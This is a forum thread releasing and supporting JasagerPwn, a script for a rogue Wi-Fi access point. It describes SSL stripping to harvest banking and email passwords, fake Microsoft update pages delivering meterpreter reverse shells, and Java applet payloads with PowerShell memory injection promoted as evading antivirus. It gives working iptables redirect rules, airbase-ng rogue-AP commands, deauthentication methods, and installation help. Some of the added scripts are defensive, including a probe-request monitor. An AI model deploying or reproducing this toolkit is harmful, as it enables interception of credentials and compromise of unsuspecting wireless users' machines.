MK2: Jasagerpwn [script] [video]


JasagerPwn Version 1.4

Considering the MK3 has been released and the thread has been unpinned, I will no longer be checking this or providing support, but will continue to keep the googlecode page updated.

Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means that while gaining client-side exploits, you have the correct documentation and permissions to do so in accordance with all US and international laws and regulations. Neither I nor any associates at Hak5 condone misuse of this script or its features.

Notes from developer:


  • Please leave your feedback regarding your experience while using this script (Good or bad), ideas for future development, improvements, and bugs. Feedback is what will keep me developing and spending my free time implementing new attacks for public use.
  • The video is older and gives a basic idea of the script, but things such as the FakeUpdate attack vector are now OS agnostic, as well as many other improvements.
  • The googlecode page has been changed. Ensure you have the most current version from the links below or else you will get errors and not receive updates. Thanks.

Script Download: JasagerPwn @ Infos3c (Right Click > Save As)

Google Code: http://code.google.com/p/jasagerpwn/

Video Download: http://blip.tv/file/get/Leg3ndary-JasagerPwnScript532.flv (Right Click > Save As)

Video Online: http://blip.tv/file/5143877

What does this do?

This is a bash script designed for BackTrack 4/5 or other Ubuntu-based distributions. It utilizes the powerful Jasager firmware on a rogue access point, allowing the attacker to seamlessly implement different attacks based on their current situation. These attacks use popular frameworks such as Metasploit, the Social Engineering Toolkit, and SSLstrip. The intention of this script is to allow seamless utilization of all the attacks with ease, allowing the success rate of your client-side attacks and the speed of the setups to skyrocket.

Included Features:

  • SSL Strip: The powerful Python implementation by none other than Moxie Marlinspike. This attack will strip out all SSL encryption from websites such as Gmail, PayPal, Chase, and similar "secured" websites. While you are in the middle with your access point, you can see the passwords pass through your system in cleartext, allowing you to gain full access to various accounts.
  • FakeUpdate: This forces your WLAN clients via iptables to a custom website setup I created using a main index.php which redirects the user based on the client OS detected. For example, if they are on Microsoft Windows, they will be redirected to a Microsoft Security Update page with a download link to a meterpreter reverse_tcp payload. As of rev7, this has support for OSX/Linux via Java applets, much more viable now!
  • BrowserPwn: This forces your WLAN clients via iptables to a web server running the Metasploit BrowserAutopwn auxiliary module. The module contains various browser-based exploits which will be run against your clients in the hope of a meterpreter or shell payload being run. Works relatively well depending on the patch levels of your clients and the current exploits available at the time; be sure to use msfupdate or -U beforehand.
  • JavaPwn: This is an attack vector from the Social Engineering Toolkit, by ReL1k. It forces your WLAN clients via iptables to either a Google or Java Required web template which will pop up a "Secure signed java applet". This applet will contain a corresponding payload for the client and is highly effective, as most users do not realize the potential risk of Java applets. Probably my personal favorite, with the highest success rate.
    - This now utilizes a new PowerShell meterpreter injection technique straight into memory, bypassing all Windows anti-viruses on Vista and Windows 7. As of v1.3 r53.
  • DeAuthorization: This section contains multiple ways to deauthorize clients on other access points in the hope that they will connect to yours. A kind of "reverse war driving" (-Darren Kitchen). In my opinion this should always be running when you're out in the wild; it will pull in clients and up your success rate substantially.
    • Airdrop-ng: A rule-based deauth attack which is by far the most effective method of collecting clients. You can add custom rules to the configuration via the "Script/Network Settings" section as needed. By default you should have yourself on here if you set up the variables correctly.
    • Mass DeAuth: A basic implementation of 'aireplay-ng -0 -D' built into a bash script I wrote. Somewhat effective if you cannot use airdrop-ng.
    • Single DeAuth: Pretty self-descriptive; allows you to check out the clients and set up attacks to grab them specifically. Useful in some situations.
  • Script/Network Settings: Some basic settings for the script and your network which can be changed "on the fly". Mostly stuff I found useful while testing the script in different situations. These include editing your airdrop-ng deauth configuration, changing your gateway interface, and refreshing your internet connection (DHCP/DNS).

Compatibility:

This was created with intentions for Alfa AWUS036H, Backtrack 4/5, and a Jasager powered router. Although it will likely work with other wireless cards and other Ubuntu based distributions if setup correctly.

Known Issues:

  • Extensive testing in lab environments can cause both the attacking and victim machine to run into connectivity issues. Reboots during testing can solve many issues on both sides.
  • DHCP Issues with the Mark 3 - Currently looking for a fix.

ChangeLog:

Revision 3: Reset revision numbers with new googlecode page.

Revision 5: Fixed update functions for new googlecode links.

Revision 6: Added MUCH more stable dependency installations.

Revision 7: Redesigned FakeUpdate with java applet for OSX/Linux.

Revision 8: Added "Java Repeater" functionality to FakeUpdate OSX/Linux.

Revision 19: Lots of minor stability changes. Updates to go with new versions of SET.

Revision 26: Removed SET altogether. Java attacks are now implemented by jasagerPwn.

Revision 30: Removed DNSspoof and used metasploit fakeDNS instead for stability. Other major changes.

Revision 51: Added ability to set gateway static, other basic changes.

Revision 53: Added new powershell payload deployment, No more anti-virus issues.. EVER!

Revision 63: Added obfuscation of normal windows payloads. Streamlined code and added NGREP script.

Edited by leg3nd
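
FakeUpdate, BrowserPwn and JavaPwn all rely on the same plumbing: the attacking box forwards traffic between the ethernet side facing the Pineapple and its upstream link, and iptables steers every client's port-80 request to a web server on the box. The script below is an added example, not jasagerPwn's own code. The variable names FONIFACE, IFACE and fonIP follow the script's configuration; the default values, the DNAT-to-local-listener approach and the rule_count check are assumptions for a lab setup (for SSLstrip, point WEBPORT at sslstrip's listening port instead of 80).

```shell
#!/bin/sh
# Transparent HTTP capture for clients behind the Pineapple: the attacking box
# forwards FONIFACE (ethernet to the Pineapple) out through IFACE (upstream)
# and DNATs every client's port-80 request to its own web server.
# Variable names mirror jasagerPwn's; the default values are lab assumptions.
FONIFACE="${FONIFACE:-eth0}"      # wired side, facing the Pineapple
IFACE="${IFACE:-wlan1}"           # upstream side (phone tether, second WLAN...)
FONIP="${FONIP:-192.168.10.2}"    # attacker's address on FONIFACE (the script's $fonIP)
WEBPORT="${WEBPORT:-80}"          # local listener: FakeUpdate page, msf, or sslstrip's port

# redirect_rules add|del : print the iptables commands for one direction
redirect_rules() {
    case "$1" in
        add) act="-A" ;;
        del) act="-D" ;;
        *)   echo "usage: redirect_rules add|del" >&2; return 1 ;;
    esac
    cat <<EOF
iptables -t nat $act POSTROUTING -o $IFACE -j MASQUERADE
iptables $act FORWARD -i $FONIFACE -o $IFACE -j ACCEPT
iptables $act FORWARD -i $IFACE -o $FONIFACE -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat $act PREROUTING -i $FONIFACE -p tcp --dport 80 -j DNAT --to-destination $FONIP:$WEBPORT
EOF
}

# apply_rules add|del : enable forwarding, then run the rules (root required)
apply_rules() {
    if [ "$1" = add ]; then
        sysctl -w net.ipv4.ip_forward=1 >/dev/null || return 1
    fi
    redirect_rules "$1" | sh -e
}

# rule_count : number of live port-80 DNAT rules. Exactly one is healthy; two
# or more means an earlier run was never torn down with "del", which is a
# common cause of the "it worked yesterday" connectivity problems in the lab.
rule_count() {
    iptables -t nat -S PREROUTING | grep -c -- '--dport 80 -j DNAT'
}

case "$1" in
    add|del) apply_rules "$1" ;;
    show)    redirect_rules add ;;
    count)   rule_count ;;
esac
```

Run "sh redirect.sh show" to review the rules before "add", and always "del" them when the engagement ends; the FORWARD rules only admit client-initiated traffic and its replies, so nothing upstream can reach the Pineapple side unsolicited.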

Thanks for the quick replies and support, it's appreciated. I have the video uploaded and fixed a few bugs; I will be updating the main post with the correct information shortly.

UPDATE:

I have had a few major bugs personally reported to me regarding the usage of this in BackTrack 5 and possibly other distros. Make sure to update your script before trying it out via googlecode or the -U/-u switches. Good luck to all, please report all other bugs to me.

Edited by leg3nd

  • 2 weeks later...

Awesome!

I am also pleased to announce that I have made some major changes to the FakeUpdate attack vector, now *nix and OSX victims will receive a Java Applet much like the SET vector which will allow for a much more effective vector in terms of Mac / Linux.

I will be releasing this later on tonight or tomorrow most likely along with some other minor changes.

Edited by leg3nd

  • 2 weeks later...

Btw, you know that you can mimic the behavior of the Jasager by using airbase-ng, available in the aircrack-ng suite.

just remember that your wireless access card MUST be supported by aircrack-ng

example:

# make sure the wifi interface is up and running:
sudo ifconfig wlan0 up

# create a monitor interface (this will create mon0)
sudo airmon-ng start wlan0

# start airbase-ng; this will create the network device at0
# -P answers every probe request, -C 30 beacons the probed ESSIDs for 30 s,
# -c 6 pins channel 6, -v is verbose; tweak if necessary (man airbase-ng)
sudo airbase-ng -i mon0 -c 6 -P -C 30 -e "FreeeWiifiii" -v mon0

# you could also specify a different listening device if you have multiple
# wireless network adapters (-i monX option), otherwise it will be limited to
# channel 6 (-c X option)

# configure at0
sudo ifconfig at0 up
sudo ifconfig at0 10.0.0.1 netmask 255.255.255.0

# start a DHCP server and DNS server, or something.. :)
# (-C selects the config file; lowercase -c is dnsmasq's cache-size option)
sudo dnsmasq -C /etc/dnsmasq.my.config

# the rest is up to your imagination. :) I'm currently working on a package
# that has a lot of the same features as this one, only it's designed to be
# more "stealthy".

# have some phun. :)

###### the end

Btw guys, this is actually a bigger threat than you might imagine. I found out that when I parked outside our office building after hours, multiple laptops associated with my computer.

A lot of them were unpatched Windows XP laptops from other companies. Imagine how fast I could attack the local network if I were a blackhat. Instead I alerted them immediately. (And they of course only took it into consideration.)

A lot of factory-installed HP laptops will try to associate with "hpsetup".

If you're an IT-admin make sure that you patch users laptops, and if you can, invest in a WIPS. :)
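
The "hpsetup" observation is exactly what a Jasager/Karma access point feeds on: clients broadcast probe requests for every SSID they remember, and the rogue AP answers all of them. Those same probes are what a defender should be watching. The script below is an added example, not part of any tool mentioned in this thread. It reads the station table of an airodump-ng CSV capture (airodump-ng -w capture mon0 writes capture-01.csv with an AP table, a blank line, then a station table whose columns are station MAC, first seen, last seen, power, packets, BSSID and then one field per probed ESSID) and flags any client probing for an SSID on a watchlist. The sample CSV is constructed and the watchlist is an assumption.

```shell
#!/bin/sh
# probe_watch.sh: flag clients that probe for SSIDs a rogue AP would happily
# answer to, using airodump-ng's CSV output (AP table, blank line, station table).

# Watchlist (assumed): factory-default and generic hotspot names.
WATCHLIST='hpsetup|linksys|default|free ?wi-?fi|attwifi|netgear'

# probe_watch REGEX CSVFILE : print "STATION_MAC<TAB>SSID" for every probed
# ESSID matching REGEX (case-insensitive). Station rows are: MAC, first seen,
# last seen, power, packets, BSSID, then one field per probed ESSID.
# Caveat: an ESSID containing a comma will be split, as it is in the CSV itself.
probe_watch() {
    awk -v re="$1" '
        BEGIN { FS = ", *"; in_st = 0 }
        /^Station MAC/ { in_st = 1; next }        # station table starts here
        !in_st || NF < 7 { next }                  # skip AP table and blank lines
        {
            for (i = 7; i <= NF; i++) {
                s = $i; gsub(/^ +| +$/, "", s)
                if (s != "" && tolower(s) ~ tolower(re)) print $1 "\t" s
            }
        }' "$2"
}

# write_sample_csv FILE : a constructed capture in airodump-ng layout (not real data)
write_sample_csv() {
    cat > "$1" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:39:11:22:33, 2011-06-10 18:02:00, 2011-06-10 18:05:40,  6,  54, WPA2, CCMP, PSK, -55,  120,  0,   0.  0.  0.  0,   8, CorpWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1E:68:AA:BB:CC, 2011-06-10 18:02:11, 2011-06-10 18:05:40, -61,  43, (not associated) ,hpsetup,linksys
00:21:5C:DD:EE:FF, 2011-06-10 18:03:02, 2011-06-10 18:04:00, -70,  12, 00:18:39:11:22:33,CorpWiFi
00:26:C7:12:34:56, 2011-06-10 18:04:30, 2011-06-10 18:05:10, -80,   3, (not associated) ,
EOF
}

# usage: sh probe_watch.sh capture-01.csv
if [ -n "$1" ]; then
    probe_watch "$WATCHLIST" "$1"
fi
```

Against the sample, only the unassociated station 00:1E:68:AA:BB:CC is reported (for hpsetup and for linksys); the corporate client probing its own SSID is not. Feeding it a capture from outside your own building, as the poster did, gives you the list of machines to go and fix before someone else finds them with a Pineapple.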


Actually yes, the original concept of this script was based on airbase-ng, but I converted it over to Jasager because airbase-ng uses a different methodology to implement Jasager, allowing only a couple of clients at a time with glitchy and unreliable results.

After getting a Pineapple I experienced MUCH more reliable results, as well as the ability to maintain 20+ clients at once. Airbase-ng can get the job done for research, but I recommend a real Jasager router for professional work and audits.

EDIT: Edited for accuracy from digininja's information.

Edited by leg3nd

Hi,

Probably a bit of a noob question, but here goes...

I currently have a Pineapple configured so I can use it happily within a Windows XP environment utilizing ICS etc. If I want to switch to BT5 and use this amazing-looking script, are there any configuration changes I need to make on the Pineapple prior to using this script, i.e. DHCP/SSID etc.?

Thanks


the reason Jasager works better than airbase for multiple clients is that Jasager uses real AP mode so all traffic is handled by dedicated kernel level code. Airbase fakes it all by using monitor mode with packet injection and does the processing in user space.


Ah okay that makes sense. I was never able to figure out what was causing it, but it was pretty blatant that a real router was needed over the soft AP. Thanks for the clarification.

I currently have a Pineapple configured so I can use it happily within a Windows XP environment utilizing ICS etc. If I want to switch to BT5 and use this amazing-looking script, are there any configuration changes I need to make on the Pineapple prior to using this script, i.e. DHCP/SSID etc.?

There is a "Wiki/Installation" page on the googlecode website that explains the setup, as well as a text file with similar information that comes with the script. You just have to set up your subnets and disable dnsmasq (DHCP server) on your FON; the script handles the rest pretty much.

Edited by leg3nd

Currently playing with this, working from the howtoinstall.

I was unable to get twisted-web

I'm also having problems with

cd /pentest/exploits/set/ && python install.py cd /pentest/wireless/airdrop-ng/ && python install.py 

I'm getting "python: can't open file 'install.py': [Errno 2] no such file or directory" are you sure you don't mean setup.py?

It looks like everything was already installed in BT5.


Yeah, sorry, I think it changed since BT4 and I did not notice. The correct method should be something along these lines:

Twisted web (I've only gotten this to work on 32-bit):

apt-get update && apt-get -y install python-twisted-bin python-twisted-core python-twisted-web python-twisted-web2

Install SET and airdrop-ng(I think airdrop-ng is scripted to be installed regardless.):

cd /pentest/exploits/set/ && chmod +x setup.py && python setup.py && cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/ && chmod +x install.py && python install.py

I updated the wiki and installHowTo files. They may already be installed in BT5, at least some of them, but I'm not sure. The script should install most of it during the dependency checks as well, still probably better off being safe and just installing it manually because I may have forgotten something.

Edited by leg3nd

Hello everyone, I have a problem with this script. I cannot get it to work and need help configuring the script according to my network settings:

Gateway IP = 192.168.0.1

Subnet = 255.255.255.0

The Pineapple comes pre-configured with 192.168.1.1. Will it work on my network? If not, what should I do? Any tips?

if you need more info please ask me.


You will need to configure both the pineapple and the variables/settings in the top of the script to reflect your network settings.

The default configuration for jasagerPwn uses the 192.168.10.0/24 subnet.


Thanks for the reply. My settings look like this, and when I try to connect to OpenWrt I don't get an IP:

subnet 192.168.0.0 netmask 255.255.255.0 {
    interface $FONIFACE;
    range 192.168.0.3 192.168.0.254;
    option routers 192.168.0.1;            <= is this my home router or the pineapple?
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.0.255;
    option domain-name-servers $fonIP;
    option domain-name \"$DomainName\";

and my Pineapple settings look like this (/etc/config/network):

config interface loopback
    option ifname   lo
    option proto    static
    option ipaddr   127.0.0.1
    option netmask  255.0.0.0

config interface lan
    option ifname   eth0
    option type     bridge
    option proto    static
    option ipaddr   192.168.0.4
    option netmask  255.255.255.0


option routers 192.168.0.1; <= is this my home router or the pineapple?

That is the IP address of your attacking computer which is facing the pineapple via ethernet. It should also be the same IP represented in the $fonIP variable.

For the setup it appears you're trying to use, the topology would be something like:

  • Pineapple: No DHCP(dnsmasq) running, 192.168.0.1
  • fonIP Variable (Attacker computer): 192.168.0.2

I will update the script to use that fonIP variable in that configuration instead and update the comments to be a little easier to understand.


You need to be much more specific with your issues for me to troubleshoot it.

At which point are the requests failing? For example, in the java attack, the fake update attack, or in normal internet connectivity.

Please use pastebin or code tags and post the top of the script (the configuration) as well as a description of the network topology you're trying to use with it.

General DNS troubleshooting...

  • While the script is running, run "cat /etc/resolv.conf" and ensure it outputs "nameserver 4.2.2.2".
  • Ensure you have dnsmasq disabled on the FON; ssh into it and run: /etc/init.d/dnsmasq stop && /etc/init.d/dnsmasq disable
  • Ensure you have the interfaces in the script configured correctly to forward your internet connection. WIFACE should be the wireless card used for attacking and de-authorization, such as an Alfa. FONIFACE should be the ethernet interface that is connected to the Pineapple/FON. IFACE should be the interface that you are sharing the connection from, which can be from a phone or a wireless AP.
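
The three troubleshooting steps above (resolv.conf, dnsmasq on the FON, interface configuration) plus the ip_forward sysctl the forwarding depends on can be run as one preflight before blaming the script. The script below is an added example, not part of jasagerPwn. Each check takes the file or directory it inspects as an argument so it can be exercised against constructed copies; the live paths, the expected nameserver 4.2.2.2 and key-based root ssh to the Pineapple (for the dnsmasq check, using busybox's pidof) are assumptions.

```shell
#!/bin/sh
# Preflight for the troubleshooting steps above: is resolv.conf pointing where
# the script expects, is forwarding on, do the configured interfaces exist,
# and is dnsmasq really stopped on the Pineapple?
EXPECT_NS="${EXPECT_NS:-4.2.2.2}"     # nameserver the script is expected to write

# check_resolv FILE NS : 0 if FILE lists NS as a nameserver
check_resolv() {
    awk -v ns="$2" '$1 == "nameserver" && $2 == ns { found = 1 } END { exit !found }' "$1"
}

# check_forward FILE : 0 if the ip_forward sysctl file reads 1
check_forward() {
    [ "$(cat "$1" 2>/dev/null)" = 1 ]
}

# check_ifaces SYSNET IFACE... : 0 if every interface exists under SYSNET
check_ifaces() {
    dir="$1"; shift; missing=""
    for i in "$@"; do
        [ -d "$dir/$i" ] || missing="$missing $i"
    done
    [ -z "$missing" ] || { echo "missing interface(s):$missing" >&2; return 1; }
}

# check_fon_dnsmasq FONIP : 0 unless dnsmasq is still running on the Pineapple
# (needs key-based root ssh; unreachable counts as "unknown", not a failure)
check_fon_dnsmasq() {
    ssh -o BatchMode=yes -o ConnectTimeout=5 "root@$1" 'pidof dnsmasq >/dev/null' 2>/dev/null
    case $? in
        0) echo "dnsmasq is still running on $1; stop and disable it" >&2; return 1 ;;
        1) return 0 ;;
        *) echo "could not reach $1 over ssh, dnsmasq state unknown" >&2; return 0 ;;
    esac
}

# preflight RESOLV IPFWD SYSNET IFACE... : run the local checks, report every failure
preflight() {
    resolv="$1"; ipfwd="$2"; sysnet="$3"; shift 3; rc=0
    check_resolv "$resolv" "$EXPECT_NS" || { echo "$resolv does not name $EXPECT_NS" >&2; rc=1; }
    check_forward "$ipfwd" || { echo "ip_forward is off" >&2; rc=1; }
    check_ifaces "$sysnet" "$@" || rc=1
    return $rc
}

# usage: WIFACE=wlan0 FONIFACE=eth0 IFACE=wlan1 sh preflight.sh [fonIP]
if [ -n "$FONIFACE" ]; then
    preflight /etc/resolv.conf /proc/sys/net/ipv4/ip_forward /sys/class/net \
        "$WIFACE" "$FONIFACE" "$IFACE"
    rc=$?
    if [ -n "$1" ]; then check_fon_dnsmasq "$1" || rc=1; fi
    exit "$rc"
fi
```

The checks deliberately keep going after the first failure so one run reports everything that is wrong; a resolv.conf that still names the home router is the usual culprit when the Java or FakeUpdate pages load but normal browsing does not.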

